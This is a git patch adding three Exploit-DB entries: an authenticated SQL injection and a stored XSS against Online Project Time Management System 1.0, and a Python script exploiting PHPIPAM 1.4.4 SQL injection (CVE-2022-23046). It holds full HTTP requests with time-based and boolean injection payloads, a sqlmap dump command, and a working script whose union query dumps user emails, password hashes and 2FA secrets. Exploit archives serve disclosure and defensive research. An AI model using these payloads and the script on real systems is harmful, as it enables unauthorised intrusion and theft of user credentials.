From f6940281e8b5d8d0e8121b7793685de8dd453766 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 26 Jan 2022 05:02:00 +0000 Subject: [PATCH] DB: 2022-01-26 3 changes to exploits/shellcodes Online Project Time Management System 1.0 - SQLi (Authenticated) Online Project Time Management System 1.0 - Multiple Stored Cross Site Scripting (XSS) (Authenticated) PHPIPAM 1.4.4 - SQLi (Authenticated) --- exploits/php/webapps/50682.txt | 106 +++++++++++++++++++++++++++ exploits/php/webapps/50683.txt | 129 +++++++++++++++++++++++++++++++++ exploits/php/webapps/50684.py | 84 +++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 322 insertions(+) create mode 100644 exploits/php/webapps/50682.txt create mode 100644 exploits/php/webapps/50683.txt create mode 100755 exploits/php/webapps/50684.py diff --git a/exploits/php/webapps/50682.txt b/exploits/php/webapps/50682.txt new file mode 100644 index 000000000..aa9c77893 --- /dev/null +++ b/exploits/php/webapps/50682.txt @@ -0,0 +1,106 @@ +# Exploit Title: Online Project Time Management System 1.0 - SQLi (Authenticated) +# Date: 19/01/2022 +# Exploit Author: Felipe Alcantara (Filiplain) +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html +# Version: 1.0 +# Tested on: Kali Linux + +# Steps to reproduce +# Log in as an employee +# Go to : http://localhost/ptms/?page=user +# Click Update +# Save request in BurpSuite +# Run saved request with sqlmap: sqlmap -r request.txt --batch --risk 3 --level 3 --dump + +========================== +POST /ptms/classes/Users.php?f=save_employee HTTP/1.1 +Host: localhost +Content-Length: 1362 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary39q8yel1pdwYRLNz +Origin: http://localhost +Referer: http://localhost/ptms/?page=user +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm +Connection: close + + +------WebKitFormBoundary39q8yel1pdwYRLNz +Content-Disposition: form-data; name="id" + +4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test +------WebKitFormBoundary39q8yel1pdwYRLNz +Content-Disposition: form-data; name="code" + +2022-0003 +------WebKitFormBoundary39q8yel1pdwYRLNz +Content-Disposition: form-data; name="generated_password" + + +------WebKitFormBoundary39q8yel1pdwYRLNz +Content-Disposition: form-data; name="firstname" + +Mark 2223 +------WebKitFormBoundary39q8yel1pdwYRLNz +Content-Disposition: form-data; name="middlename" + +Z +------WebKitFormBoundary39q8yel1pdwYRLNz +Content-Disposition: form-data; name="lastname" + +Cooper +------WebKitFormBoundary39q8yel1pdwYRLNz +Content-Disposition: form-data; name="gender" + +Male +------WebKitFormBoundary39q8yel1pdwYRLNz +Content-Disposition: form-data; name="department" + +IT Department +------WebKitFormBoundary39q8yel1pdwYRLNz +Content-Disposition: form-data; name="position" + +Department Manager +------WebKitFormBoundary39q8yel1pdwYRLNz +Content-Disposition: form-data; name="email" + +mcooper@sample.com +------WebKitFormBoundary39q8yel1pdwYRLNz +Content-Disposition: form-data; name="password" + + +------WebKitFormBoundary39q8yel1pdwYRLNz +Content-Disposition: form-data; name="img"; filename="" +Content-Type: application/octet-stream + + +------WebKitFormBoundary39q8yel1pdwYRLNz-- + + + + +========================== + +#Payloads +#++++++++++++ +#Payload: (Boolean-Based Blind) + +#------WebKitFormBoundary39q8yel1pdwYRLNz +#Content-Disposition: form-data; name="id" + +#4' or 1=1 -- + +#-------- + +#Payload: (time-based blind) + +#------WebKitFormBoundary39q8yel1pdwYRLNz +#Content-Disposition: form-data; name="id" + +#4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test + +#------- \ No newline at end of file diff --git a/exploits/php/webapps/50683.txt b/exploits/php/webapps/50683.txt new file mode 100644 index 000000000..4ecd19c3e --- /dev/null +++ b/exploits/php/webapps/50683.txt @@ -0,0 +1,129 @@ +# Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated) +# Date: 19/01/2022 +# Exploit Author: Felipe Alcantara (Filiplain) +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html +# Version: 1.0 +# Tested on: Kali Linux +# Description: Stored XSS in multiple fields... + +# Steps to reproduce (with employee Access) + +# Log in as an employee +# Go to : http://localhost/ptms/?page=user +# Add XSS payload to any field of the user's name. +#Click Update + + +================= +POST /ptms/classes/Users.php?f=save_employee HTTP/1.1 +Host: localhost +Content-Length: 1339 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak +Origin: http://localhost +Referer: http://localhost/ptms/?page=user +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm +Connection: close + +------WebKitFormBoundaryvsLkAfaBC64Uzoak +Content-Disposition: form-data; name="id" + +4 +------WebKitFormBoundaryvsLkAfaBC64Uzoak +Content-Disposition: form-data; name="code" + +2022-0003 +------WebKitFormBoundaryvsLkAfaBC64Uzoak +Content-Disposition: form-data; name="generated_password" + + +------WebKitFormBoundaryvsLkAfaBC64Uzoak +Content-Disposition: form-data; name="firstname" + +Mark +------WebKitFormBoundaryvsLkAfaBC64Uzoak +Content-Disposition: form-data; name="middlename" + + +------WebKitFormBoundaryvsLkAfaBC64Uzoak +Content-Disposition: form-data; name="lastname" + +Cooper +------WebKitFormBoundaryvsLkAfaBC64Uzoak +Content-Disposition: form-data; name="gender" + +Male +------WebKitFormBoundaryvsLkAfaBC64Uzoak +Content-Disposition: form-data; name="department" + +IT Department +------WebKitFormBoundaryvsLkAfaBC64Uzoak +Content-Disposition: form-data; name="position" + +Department Manager +------WebKitFormBoundaryvsLkAfaBC64Uzoak +Content-Disposition: form-data; name="email" + +mcooper@sample.com +------WebKitFormBoundaryvsLkAfaBC64Uzoak +Content-Disposition: form-data; name="password" + +------WebKitFormBoundaryvsLkAfaBC64Uzoak +Content-Disposition: form-data; name="img"; filename="" +Content-Type: application/octet-stream + +------WebKitFormBoundaryvsLkAfaBC64Uzoak-- +================= + +----------------------------------------------------------------------------- + +# Steps to reproduce (with Admin access) + +# Log in to the admin panel +# Go to : http://localhost/ptms/admin/?page=system_info +# Add XSS payload to the 'System Name' field +#Click Update + + +================= + +POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1 +Host: localhost +Content-Length: 603 +Accept: */* +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq +Origin: http://localhost +Referer: http://localhost/ptms/admin/?page=system_info +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm +Connection: close + +------WebKitFormBoundaryCibB6pEzThjb4Zcq +Content-Disposition: form-data; name="name" + +Online Project Time Management System - PHP +------WebKitFormBoundaryCibB6pEzThjb4Zcq +Content-Disposition: form-data; name="short_name" + +PTMS - PHP +------WebKitFormBoundaryCibB6pEzThjb4Zcq +Content-Disposition: form-data; name="img"; filename="" +Content-Type: application/octet-stream + + +------WebKitFormBoundaryCibB6pEzThjb4Zcq +Content-Disposition: form-data; name="cover"; filename="" +Content-Type: application/octet-stream + + +------WebKitFormBoundaryCibB6pEzThjb4Zcq-- + +================= \ No newline at end of file diff --git a/exploits/php/webapps/50684.py b/exploits/php/webapps/50684.py new file mode 100755 index 000000000..d33067c5f --- /dev/null +++ b/exploits/php/webapps/50684.py @@ -0,0 +1,84 @@ +# Exploit Title: PHPIPAM 1.4.4 - SQLi (Authenticated) +# Google Dork: [if applicable] +# Date: 20/01/2022 +# Exploit Author: Rodolfo "Inc0gbyt3" Tavares +# Vendor Homepage: https://github.com/phpipam/phpipam +# Software Link: https://github.com/phpipam/phpipam +# Version: 1.4.4 +# Tested on: Linux/Windows +# CVE : CVE-2022-23046 + +import requests +import sys +import argparse + +################ +""" +Author of exploit: Rodolfo 'Inc0gbyt3' Tavares +CVE: CVE-2022-23046 +Type: SQL Injection + +Usage: + +$ python3 -m pip install requests +$ python3 exploit.py -u http://localhost:8082 -U -P +""" +############### + +__author__ = "Inc0gbyt3" + +menu = argparse.ArgumentParser(description="[+] Exploit for PHPIPAM Version: 1.4.4 Authenticated SQL Injection\n CVE-2022-23046") +menu.add_argument("-u", "--url", help="[+] URL of target, example: https://phpipam.target.com", type=str) +menu.add_argument("-U", "--user", help="[+] Username", type=str) +menu.add_argument("-P", "--password", help="[+] Password", type=str) +args = menu.parse_args() + +if len(sys.argv) < 3: + menu.print_help() + +target = args.url +user = args.user +password = args.password + + +def get_token(): + u = f"{target}/app/login/login_check.php" + + try: + r = requests.post(u, verify=False, timeout=10, headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, data={"ipamusername":user, "ipampassword":password}) + headers = r.headers['Set-Cookie'] + headers_string = headers.split(';') + for s in headers_string: + if "phpipam" in s and "," in s: # double same cookie Check LoL + cookie = s.strip(',').lstrip() + return cookie + except Exception as e: + print(f"[+] {e}") + + +def exploit_sqli(): + cookie = get_token() + xpl = f"{target}/app/admin/routing/edit-bgp-mapping-search.php" + data = { + "subnet":'pwn"union select(select concat(@:=0x3a,(select+count(*) from(users)where(@:=concat(@,email,0x3a,password,"0x3a",2fa))),@)),2,3,user() -- -', # dios query dump all :) + "bgp_id":1 + } + + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", + "Cookie": cookie + } + + try: + r = requests.post(xpl, verify=False, timeout=10, headers=headers, data=data) + if "admin" in r.text or "rounds" in r.text: + print("[+] Vulnerable..\n\n") + print(f"> Users and hash passwords: \n\n{r.text}") + print("\n\n> DONE <") + except Exception as e: + print(f"[-] {e}") + + + +if __name__ == '__main__': + exploit_sqli() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b2baf55d8..3ab4ef029 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44759,3 +44759,6 @@ id,file,description,date,author,type,platform,port 50677,exploits/php/webapps/50677.txt,"Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php, 50678,exploits/php/webapps/50678.txt,"Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php, 50681,exploits/php/webapps/50681.txt,"Landa Driving School Management System 2.0.1 - Arbitrary File Upload",1970-01-01,"Sohel Yousef",webapps,php, +50682,exploits/php/webapps/50682.txt,"Online Project Time Management System 1.0 - SQLi (Authenticated)",1970-01-01,"Felipe Alcantara",webapps,php, +50683,exploits/php/webapps/50683.txt,"Online Project Time Management System 1.0 - Multiple Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Felipe Alcantara",webapps,php, +50684,exploits/php/webapps/50684.py,"PHPIPAM 1.4.4 - SQLi (Authenticated)",1970-01-01,"Rodolfo Tavares",webapps,php,